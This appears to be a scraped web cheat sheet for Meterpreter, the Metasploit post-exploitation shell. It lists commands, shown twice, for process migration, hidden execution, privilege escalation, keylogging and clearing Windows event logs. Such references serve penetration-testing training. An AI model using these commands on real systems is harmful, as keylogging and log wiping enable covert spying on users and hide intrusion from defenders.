General

background

Put the meterpreter session in background

session $SESSION_ID

Come back to a meterpreter session

Machine Info

System

sysinfo

System information

Network

ifconfig

Network information

Processes

ps

List running processes

getpid $PROCESS_NAME

Get the process ID of a running process

migrate $PID

Migrate to a process using its process ID

Files

Navigation

cd

Change directory

ls

List directory

search -f $FILE_NAME

Search for a file

File content

cat

Print content of file

edit

Open a text editor

Download/Upload

download

Download a file (replace single slashes with double slashes)

upload

Upload a file

Execution

execute -f $PROGRAM_TO_EXECUTE -i -H

Execute a file (-i for interactive, -H for hidden)

shell

Open a shell

run $METASPLOIT_SCRIPT

Run a metasploit script

Exploitation

Windows

getsystem

Automatically try to privesc

run post/windows/gather/enum_applications

Enum applications installed on the machine

run post/windows/manage/migrate

Automatically launch and migrate to notepad.exe

Multi

keyscan_start

Start the keylogger

keyscan_dump

Dump the content of the keylogger

keyscan_stop

Stop the keylogger

clearev

Clear the event logs (needs admin)

General

background

Put the meterpreter session in background

session $SESSION_ID

Come back to a meterpreter session

Machine Info

System

sysinfo

System information

Network

ifconfig

Network information

Processes

ps

List running processes

getpid $PROCESS_NAME

Get the process ID of a running process

migrate $PID

Migrate to a process using its process ID

Files

Navigation

cd

Change directory

ls

List directory

search -f $FILE_NAME

Search for a file

File content

cat

Print content of file

edit

Open a text editor

Download/Upload

download

Download a file (replace single slashes with double slashes)

upload

Upload a file

Execution

execute -f $PROGRAM_TO_EXECUTE -i -H

Execute a file (-i for interactive, -H for hidden)

shell

Open a shell

run $METASPLOIT_SCRIPT

Run a metasploit script

Exploitation

Windows

getsystem

Automatically try to privesc

run post/windows/gather/enum_applications

Enum applications installed on the machine

run post/windows/manage/migrate

Automatically launch and migrate to notepad.exe

Multi

keyscan_start

Start the keylogger

keyscan_dump

Dump the content of the keylogger

keyscan_stop

Stop the keylogger

clearev

Clear the event logs (needs admin)

Meterpreter Cheat Sheet

General

Machine Info

System

Network

Processes

Files

Navigation

File content

Download/Upload

Execution

Exploitation

Windows

Multi

Meterpreter Cheat Sheet

General

Machine Info

System

Network

Processes

Files

Navigation

File content

Download/Upload

Execution

Exploitation

Windows

Multi